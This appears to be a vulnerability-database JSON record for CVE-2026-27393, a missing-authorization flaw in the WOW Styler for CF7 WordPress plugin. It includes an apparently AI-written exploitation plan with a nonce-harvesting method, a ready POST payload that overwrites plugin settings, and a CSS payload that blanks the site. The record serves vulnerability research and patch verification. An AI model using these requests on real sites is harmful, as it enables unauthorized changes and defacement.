[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffQCL9FBpY-39O_4V1zE7uDaMaZsTimCeJ-uwxHsrBPQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-27393","wow-styler-for-cf7-visual-styler-for-contact-form-7-forms-missing-authorization","WOW Styler for CF7 – Visual Styler for Contact Form 7 Forms \u003C= 1.7.6 - Missing Authorization","The WOW Styler for CF7 – Visual Styler for Contact Form 7 Forms plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","cf7-styler",null,"\u003C=1.7.6","1.8.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-21 00:00:00","2026-05-26 19:15:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2bf114d2-6617-4681-b363-7dafb2308887?source=api-prod",6,[22,23,24,25,26,27,28,29],"README.txt","admin\u002Fclass-cf7-customizer-admin-ajax.php","admin\u002Fclass-cf7-customizer-admin.php","admin\u002Fjs\u002Fcf7-customizer-admin.js","admin\u002Fpartials\u002Fcf7-customizer-admin-display.php","admin\u002Fpartials\u002Fcf7-customizer-admin-preview-mode.php","admin\u002Fpartials\u002Fcf7-customizer-admin-tab-form-customize.php","admin\u002Fpartials\u002Fcf7-customizer-admin-tab-required-plugin.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-27393 (WOW Styler for CF7)\n\n## 1. Vulnerability Summary\nThe **WOW Styler for CF7** plugin (versions \u003C= 1.7.6) is vulnerable to **Missing Authorization** in its AJAX handlers. Specifically, functions in `Cf7_Customizer_Admin_Ajax` (located in `admin\u002Fclass-cf7-customizer-admin-ajax.php`) check for a CSRF nonce but fail to perform a capability check (e.g., `current_user_can('manage_options')`). This oversight allows any user—including unauthenticated attackers if the action is registered as `nopriv`—to modify plugin settings and style schemes.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `cf7cstmzr_save_form_customizer_settings` (and potentially `cf7cstmzr_new_form_customizer_settings`)\n- **Authentication**: Unauthenticated (per CVE description) or low-privileged users.\n- **Payload Parameter**: `formData` (array), `nonce`, `styleSchemeSlug`.\n- **Preconditions**: The attacker must obtain a valid nonce for the `cf7cstmzr_save_form_customizer_settings_nonce` action.\n\n## 3. Code Flow\n1. **Entry Point**: A POST request is sent to `admin-ajax.php` with `action=cf7cstmzr_save_form_customizer_settings`.\n2. **Nonce Verification**: `Cf7_Customizer_Admin_Ajax::save_form_customizer_settings()` calls `check_ajax_referer( 'cf7cstmzr_save_form_customizer_settings_nonce', 'nonce' )`.\n3. **Missing Authorization**: The function proceeds directly to logic without verifying if the requester has administrative privileges.\n4. **Data Processing**: The `formData` array is parsed. The code uses `explode('_', $name)` to reconstruct a nested configuration array (`$form_data_array`).\n5. **Sink**: `update_option('cf7cstmzr_style_schemes', $style_schemes)` is called on line 124, overwriting the global plugin configuration with user-supplied data.\n\n## 4. Nonce Acquisition Strategy\nWordPress nonces for `uid=0` (unauthenticated) are often leaked through localized scripts if the plugin enqueues them on the frontend.\n\n1. **Identify the Script**: The plugin enqueues scripts using the handle `$this->plugin_name` (verbatim `cf7-styler`).\n2. **Localization Object**: The JS object containing nonces is `cf7cstmzr_ajax_object`.\n3. **Target Variable**: `cf7cstmzr_ajax_object.save_form_customizer_settings_nonce`.\n4. **Acquisition Plan**:\n   - Create a page containing a Contact Form 7 form (since the styler likely enqueues its assets when a form is present).\n   - Use the `browser_navigate` tool to visit the page.\n   - Execute `browser_eval(\"window.cf7cstmzr_ajax_object?.save_form_customizer_settings_nonce\")` to retrieve the token.\n   - If that fails, check the site homepage or any page where the plugin's \"Live Preview\" might be active.\n\n## 5. Exploitation Strategy\nWe will perform an unauthorized update of the default styling scheme to change the form text color to red, proving control over site settings.\n\n### Step-by-Step Plan:\n1. **Request**: Use `http_request` to send a POST to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2. **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n3. **Payload**:\n   ```\n   action=cf7cstmzr_save_form_customizer_settings\n   &nonce=[EXTRACTED_NONCE]\n   &styleSchemeSlug=default\n   &styleSchemeTitle=Exploited\n   &formData[0][name]=cf7cstmzr_form_text_color\n   &formData[0][value]=#FF0000\n   ```\n   *Note: The `formData` names are prefixed with `cf7cstmzr_` which the plugin strips before exploding.*\n\n## 6. Test Data Setup\n1. **Install Dependencies**: Ensure **Contact Form 7** is installed and active.\n2. **Create Form**: `wp eval \"if(!get_posts(['post_type'=>'wpcf7_contact_form'])){ WPCF7_ContactForm::save_post(['title'=>'Test Form','form'=>'[text* name]']); }\"`\n3. **Create Page**: \n   ```bash\n   wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[contact-form-7 id=\"TARGET_ID\"]'\n   ```\n4. **Initialize Plugin**: Navigate to the CF7 Styler admin page once as admin to ensure default options are populated.\n\n## 7. Expected Results\n- **HTTP Response**: `{\"success\":1,\"error\":0,\"message\":\"Success: Saved\"}`\n- **Database Change**: The WordPress option `cf7cstmzr_style_schemes` will be updated.\n\n## 8. Verification Steps\nAfter the exploit, verify the change using WP-CLI:\n```bash\nwp option get cf7cstmzr_style_schemes --format=json\n```\nCheck if the `default` -> `scheme` -> `form` -> `text` -> `color` (reconstructed from `form_text_color`) is set to `#FF0000`.\n\n## 9. Alternative Approaches\n### Bypassing Sanitization for Defacement\nThe `custom_css` field uses `sanitize_textarea_field`.\n```php\n} elseif ('custom_css' === $name) {\n    $value = sanitize_textarea_field($form_data['value']);\n}\n```\nAn attacker can inject malicious CSS to deface the site:\n`formData[0][name]=cf7cstmzr_custom_css&formData[0][value]=body { display: none !important; }`\n\n### Creating New Schemes\nUse the `cf7cstmzr_new_form_customizer_settings` action (requires obtaining the `new_form_customizer_settings_nonce`) to create arbitrary styling schemes that can be applied to forms via the `styleSchemeSlug` parameter.","gemini-3-flash-preview","2026-06-04 22:27:52","2026-06-04 22:29:27",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.7.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcf7-styler\u002Ftags\u002F1.7.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcf7-styler.1.7.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcf7-styler\u002Ftags\u002F1.8.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcf7-styler.1.8.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcf7-styler\u002Ftags"]